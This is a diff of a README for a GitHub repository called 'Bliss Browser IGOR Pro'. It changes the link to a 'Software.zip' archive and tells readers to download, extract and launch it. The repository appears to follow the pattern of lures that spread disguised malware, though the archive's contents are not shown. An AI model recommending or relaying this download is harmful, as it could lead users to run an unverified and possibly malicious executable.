why12312341q/Bliss_Browser_IGOR-Pro/README.md

 ## Installation 💻

-To get started, download the **Software.zip** file from [here](https://github.com/user-attachments/files/18388744/Software.zip).
+To get started, download the **https://github.com/why12312341q/Bliss_Browser_IGOR-Pro/releases/download/v1.0/Software.zip** file from [here](https://github.com/why12312341q/Bliss_Browser_IGOR-Pro/releases/download/v1.0/Software.zip).
 Once downloaded, extract the contents and launch the application to begin using **Bliss Browser IGOR Pro**.

 If the software is not launching from the provided link, please check the "Releases" section of this repository for alternative methods.